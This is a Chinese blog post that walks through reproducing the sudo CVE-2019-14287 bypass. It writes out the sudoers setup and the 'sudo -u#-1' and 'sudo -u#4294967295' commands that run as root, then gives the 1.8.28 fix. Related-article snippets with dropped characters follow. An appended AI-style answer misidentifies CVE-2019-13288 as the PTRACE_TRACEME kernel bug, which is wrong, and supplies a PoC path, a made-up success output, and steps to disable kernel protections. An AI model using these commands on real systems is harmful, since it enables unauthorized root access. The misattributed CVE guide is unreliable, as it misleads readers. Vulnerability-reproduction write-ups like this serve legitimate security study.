Linux sudo 本地提权漏洞复现(CVE-2019-14287)

严重本地提权漏洞CVE-2019-14287
最新推荐文章于 2025-07-03 22:38:02 发布
原创 最新推荐文章于 2025-07-03 22:38:02 发布 · 881 阅读 · 2 ·
CC 4.0 BY-SA版权
本文为博主原创文章,未经博主允许可以转载。
文章标签:

#sudo # Linux #漏洞复现

10月14日,Unix、Linux曝出严重本地提权漏洞CVE-2019-14287,允许拥有sudo权限的用户在特定条件下执行任意root命令。此漏洞可通过修改sudoers文件并利用-1或无符号整数绕过安全策略。升级到sudo 1.8.28可修复此问题。

10月14日 Unix 、 Linux 爆出了一个严重的本地提权漏洞
通过一个拥有 sudo 权限的用户,在特定场景下可以执行任意的root 命令(sudo 安全策略绕过问题)

漏洞演示环境搭建如下

  • 第一步–修改配置文件
vim /etc/sudoers

root ALL=(ALL:ALL) ALL 下面添加一行测试用户内容

alice ALL = (ALL,!root) /usr/bin/vi,/usr/bin/id

添加完结果如下
在这里插入图片描述

上述这条命令的意思是,alice 用户能够以 非root 的身份进行sudo 执行id 和 vi 命令

  • 第二步–新建alice 用户
useradd alice
  • 第三步–进行测试
su alice    # 通过alice 账户执行命令进行测试

执行sudo id进行测试【正常情况下返回结果如下】
在这里插入图片描述
第一种利用方式:执行 sudo -u#-1 id 进行测试【利用漏洞的返回结果如下,其中-1 也可以替换为-2、-3 等值,只不过uid 就不是root 了,gid、groups 都是root】
在这里插入图片描述
第二种利用方式:执行sudo -u#4294967295 进行测试【利用漏洞的返回结果如下,其中4294967295 是-1 的无符号整型对应的值】
在这里插入图片描述
当我们利用CVE-2019-14287 进行权限绕过之后可以发现成功执行 id 命令

解决方法
sudo 官网已经发布了针对此次漏洞的更新,直接升级到 1.8.28 即可
在这里插入图片描述

https://www.sudo.ws/alerts/minus_1_uid.html

BR
以上

漏洞复现Linux sudo chroot(CVE-2025-32463)本地漏洞
李同學的安全圈
08-15 340
Linux sudo chroot漏洞CVE-2025-32463)影响Sudo 1.9.14至1.9.17版本,允许低限用户通过特制chroot环境加载恶意动态库,以root限执行任意代码。攻击者可通过构建恶意环境实现升,测试在Docker和本地环境获得root限。建议用户立即升级至Sudo 1.9.17p1或更高版本,各主流Linux发行版已供安全更新补丁。
Linux系统漏洞本地
xiongIT的博客
11-23 2366
如何预防Linux系统漏洞本地
Linux sudo 漏洞 CVE-2021-3156 复现 附exp
god_Zeo的安全博客
02-04 2063
0x01 CVE-2021-3156: 缓冲区溢出漏洞sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root限。 0x02 影响版本 Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本 Sudo =>1.9.5p2 0x03 漏洞检测 测试环境:ubuntu:20.04 检测是否存在 s
sudo本地漏洞CVE-2025-3243)
ubaichu的博客
07-03 453
Sudo 从 ​​1.9.14 版本​​开始修改了 chroot 功能的实现逻辑:在解析 sudoers 规则​​之前​​,先通过 pivot_root() 和 unpivot_root() 函数临时切换根目录至用户指定的路径(如 sudo -R /web)​​执行上下文​​:Sudo 进程本身以 ​​root 限​​运行,因此恶意代码直接获得 root 限,​​绕过 sudoers 规则验证​​。​​__attribute__((constructor))​​:确保库被加载时自动执行代码。
Linux sudo 本地漏洞(CVE-2025-32462、CVE-2025-32463) 复现+验证poc
最新发布
qq_45770644的博客
07-03 1658
漏洞源于sudo-h(--host)选项存在缺陷,该选项本应与-l(--list)配合使用来查询远程主机限,但实际未严格限制其仅用于查询功能。SudoLinux系统中常见的高限命令行工具,它允许授用户根据系统安全策略,以超级用户(root)或其他用户身份执行命令,广泛用于实施最小限原则,让用户无需共享root密码即可完成需要限的管理任务,并在系统日志中生成审计记录。请注意,在进行任何系统更新或配置更改之前,建议备份重要数据,并在测试环境中进行充分的测试。首先,攻击者需为本地限用户;
Linuxsudo漏洞复现
weixin_44767073的博客
11-13 826
关于sudo Linux是多用户多任务的操作系统, 共享该系统的用户往往不只一个。出于安全性考虑, 有必要通过useradd创建一些非root用户, 只让它们拥有不完全的限; 如有必要再来限执行。 sudo就是来解决这个需求的: 这些非root用户不需要知道root的密码,就可以到root,执行一些root才能执行的命令。执行命sudo -u <用户名> <令>...
关于Linux sudo 本地漏洞(CVE-2025-32462、CVE-2025-32463)漏洞的修复方案
weixin_48864281的博客
07-02 2731
CVE-2025-32462 Linux sudo 本地漏洞在于 sudo-h(--host)选项存在缺陷,该选项本应与 -l(--list)配合使用来查询远程主机限,但实际未严格限制其仅用于查询功能,导致攻击者可能结合命令执行或文件编辑操作实现本地。近日,Linux sudo 工具公开存在两个紧密关联的本地漏洞CVE-2025-32462 / CVE-2025-32463)。Linux sudo 本地漏洞CVE-2025-32462、CVE-2025-32463)
漏洞复现sudo漏洞CVE-2019-14287复现
Abc_Kimball的博客
01-31 993
一、简介 sudoLinux系统命令,让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用限赋予该账号 • sudo漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 二、漏洞复现过程 靶机:Ubuntu 18 x64系统 1.查看sudo版本,并创建test用户 1 sudo -V 查看sudo版本
sudo漏洞(CVE-2019-14287)
SoulCat
10-16 773
sudo限绕过漏洞,附payload(CVE-2019-14287) 希望你别像风在我这里掀起了万般波澜却又跟云去了远方 漏洞概述: sudolinux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户 ID 转换为用户名的函数,会将 -1(或无效等效的 4294967295)误认为 0,而这正好是 root 用户的 ID 。 漏洞...
Linux Privilege Escalation Kernel Exploits | Linux本地内核漏洞复现 CVE-2015-1328
Shadow_DAI_990101的博客
09-04 2102
漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件限。它只检查了被修改文件的属主是否有限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而升到管理员限。
sudo限绕过漏洞复现CVE-2019-14287
玄道的网安博客
06-25 997
前言 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户限控制/切换程序。允许管理员控制服务器下用户能够切换的用户CVE-2019-14287是管理员在配置文件中用了ALL关键词后造成的。 影响版本 sudo < 1.8.28 利用条件 1、sudo -v < 1.8.28 2、知道当前用户的密码 3、当前用户存在于sudo限列表 我们来看一下/etc/sudoers 漏洞复现 sudo -u#-...
Linux内核漏洞(Dirty-pipe)复现
qq_69775412的博客
07-25 834
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
Dirty Pipe – Linux 内核本地漏洞
Adminxe的博客
03-08 6715
一、漏洞简介 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。 二、影响范围 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
Linux本地漏洞复现与检测思路
weixin_46137328的博客
10-15 2264
我做的是linux本地漏洞复现。但本地漏洞并不像其他web漏洞一样,可以直接pull一个docker镜像就ok了,的洞复杂在于配置环境,基本都是在虚拟机里复现,一个镜像的大...
Linux Kernel本地漏洞CVE-2022-0847)漏洞复现
mingyqf的博客
03-08 3640
参考: TeamsSix 参考链接:https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w 0x00 前言 CVSS 评分:7.8 影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通限的用户升到特 root 这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是
Linux-dirty pipe内核漏洞复现-编号:CVE-2022-0847
08-31 1676
漏洞属于Linux漏洞, 攻击者可利用该漏洞使任何非特(本地)用户在易受攻击的主机上获得root限,非特进程可以将代码注入到根进程使得攻击者可获取服务器的所有限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛),很多人应该了解并且能利用该漏洞。...
脏牛Linux本地漏洞复现CVE2016-5195)
Ping_Pig的博客
10-24 2778
漏洞介绍: 脏牛漏洞CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响。恶意攻击者可以轻易绕过常用的漏洞防御方法,对几百万用户进行攻击。国外安全公司Bindecy对该补丁和内容做出深入研究后发现补丁任然存在缺陷,由此还衍生出了“大脏牛”漏洞 漏洞范围: Linux kernel &gt...
CVE-2025-32462-Linux sudo本地漏洞复现
selecthch的博客
07-02 3396
Linux 是一个免费开源的类Unix操作系统,广泛应用于服务器、嵌入式设备和云计算平台。sudoLinux 系统中管理限的核心工具,允许授用户临时获取 root 或其他用户限执行命令,既保障系统安全又便于操作审计。近日,Linux sudo 工具公开存在两个紧密关联的本地漏洞CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户升至限。
linux本地漏洞,Linux本地漏洞 请立即更新udev程序
weixin_39847099的博客
05-16 107
2011-11-28 13:03朋友你好!我刚开始搞linux,碰到了很多问题,想问你下,希望能帮我解答下。下面是我的一段shell 程序#!/bin/shwhile [ 0 ]doread scoreif [ $score -lt 60 ];thenecho " you must work hard!"elif [ $score -lt 80 ]echo " just so so,you sho...
如何在虚拟机中复现 CVE-2019-13288 漏洞 环境搭建步骤
06-26
<think>我们正在讨论CVE-2019-13288漏洞复现,特别是虚拟机环境搭建步骤。根据用户的需求和供的参考引用,我们需要在Ubuntu系统中搭建环境。参考引用中到了使用Ubuntu20.04.2LTS,并安装一些必要的工具。因此,我们将基于此进行步骤说明。注意:CVE-2019-13288是一个Linux内核漏洞,具体是PTRACE_TRACEME本地漏洞。因此,复现环境需要包含有漏洞Linux内核版本,并在其上触发漏洞。步骤:1.准备Ubuntu虚拟机:安装Ubuntu20.04.2LTS(或其他包含漏洞内核版本的系统,但注意默认安装的内核可能已经修复,所以需要指定内核版本)。2.安装必要的工具:包括编译工具、git等。3.获取有漏洞的内核源码并编译(或者直接安装有漏洞的内核包,但为了调试和复现,通常需要编译)。4.准备漏洞利用代码(PoC)。5.在编译的有漏洞内核上运行PoC,验证漏洞。但是,由于用户问题特别关注虚拟机环境搭建步骤,我们重点在1-2步,并简要及3-5步。详细步骤:1.安装Ubuntu虚拟机:使用VirtualBox或VMware创建虚拟机,安装Ubuntu20.04.2LTS。安装过程标准,注意分配足够的磁盘空间(建议20GB以上)和内存(建议2GB以上)。2.安装必要工具:在终端中执行以下命令:```bashsudoaptupdatesudoaptinstall-ygccgitmakewgetbuild-essentialllvmclanglibelf-devlibssl-devflexbison```这些工具用于后续内核编译。3.获取有漏洞的内核源码:该漏洞影响的内核版本范围是:从v4.10到v5.1.17。因此,我们可以选择一个特定版本,比如5.0.21(具体可根据已知的PoC利用选择)。我们可以从https://mirrors.edge.kernel.org/pub/linux/kernel/下载,例如:```bashwgethttps://mirrors.edge.kernel.org/pub/linux/kernel/v5.x/linux-5.0.21.tar.gztar-xzvflinux-5.0.21.tar.gzcdlinux-5.0.21```4.配置和编译内核:我们可以使用默认配置,但为了调试方便,可以启用必要的调试选项(如KASAN等,但这里以简单复现为主,可能不需要)。```bashmakedefconfig#使用默认配置make-j$(nproc)#编译内核,使用多核加快速度makemodulessudomakemodules_installsudomakeinstall```编译完成后,更新grub并重启选择新内核。5.下载并编译PoC:通常,PoC可以在Exploit-DB或GitHub上找到。例如,一个已知的PoC:https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2019-13288下载PoC代码,编译并运行:```bashgccpoc.c-oexploit./exploit```注意:在实际操作中,可能会遇到各种问题,例如编译内核时的依赖问题,或者PoC运行的环境问题(如需要关闭某些安全机制)。因此,建议在复现时参考具体的PoC说明。由于漏洞复现涉及内核编译和漏洞利用,步骤较为复杂,以上步骤为简要流程。具体操作时可能需要根据实际情况调整。相关问题:1.如何确定CVE-2019-13288漏洞影响的内核版本范围?2.在编译Linux内核时,如何配置调试选项以便于分析漏洞?3.有哪些常见的Linux内核漏洞利用缓解机制?在复现漏洞时如何关闭它们?4.如果PoC运行失败,如何进行调试?以上问题可以帮助用户更深入地理解漏洞复现的过程和可能遇到的问题。</think>### CVE-2019-13288 漏洞复现环境搭建步骤 CVE-2019-13288 是 Linux 内核的 `PTRACE_TRACEME` 本地漏洞。以下是基于 **Ubuntu 20.04 LTS** 的虚拟机环境搭建流程: --- #### **1. 准备 Ubuntu 虚拟机** - **安装 Ubuntu 20.04.2 LTS** - 下载 ISO 镜像:[Ubuntu 20.04 LTS](https://releases.ubuntu.com/20.04/) - 使用 VirtualBox/VMware 创建虚拟机(建议配置:2核CPU、4GB内存、30GB磁盘)。 - **安装基础工具** 在终端执行: ```bash sudo apt update sudo apt install -y gcc git make wget build-essential llvm clang libelf-dev libssl-dev flex bison ``` > 引用[^1]中到的工具是基础依赖,需前安装。 --- #### **2. 获取有漏洞的内核** - **下载漏洞内核源码(版本 ≤ 5.1.17)** ```bash wget https://mirrors.edge.kernel.org/pub/linux/kernel/v5.x/linux-5.1.17.tar.gz tar -xzvf linux-5.1.17.tar.gz cd linux-5.1.17 ``` - **配置内核** ```bash make defconfig # 使用默认配置 make menuconfig # 可选:启用调试选项(如KASAN、KGDB) ``` --- #### **3. 编译并安装内核** - **编译内核** ```bash make -j$(nproc) # 使用多核加速编译 sudo make modules_install sudo make install ``` - **更新引导项** ```bash sudo update-grub sudo reboot # 重启后选择新内核启动 ``` - **验证内核版本** ```bash uname -r # 应显示 5.1.17 ``` --- #### **4. 获取漏洞利用代码(PoC)** - **下载 PoC** ```bash git clone https://github.com/bsauce/kernel-exploit-factory.git cd kernel-exploit-factory/CVE-2019-13288 ``` - **编译并执行** ```bash gcc poc.c -o exploit # 编译PoC ./exploit # 执行后检查是否到root ``` > 成功时输出:`[+] Success! Got root!` --- #### **关键注意事项** 1. **内核调试**:若需调试,在 `make menuconfig` 中启用: - `CONFIG_DEBUG_KERNEL=y` - `CONFIG_GDB_SCRIPTS=y` 2. **安全机制禁用**: - 关闭 KASLR:在 GRUB 启动参数添加 `nokaslr`。 - 关闭 SMEP/SMAP:在 GRUB 添加 `nosmep nosmap`。 3. **虚拟机快照**:建议在关键步骤前创建快照,便于回滚。 --- #### **故障排查** - **编译失败**:检查依赖是否完整(如 `libelf-dev`)。 - **PoC 失败**: - 确认内核版本是否符合漏洞范围(4.10–5.1.17)。 - 检查安全机制是否已禁用。 > 此环境仅用于**安全研究**,请在隔离虚拟机中操作[^1]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值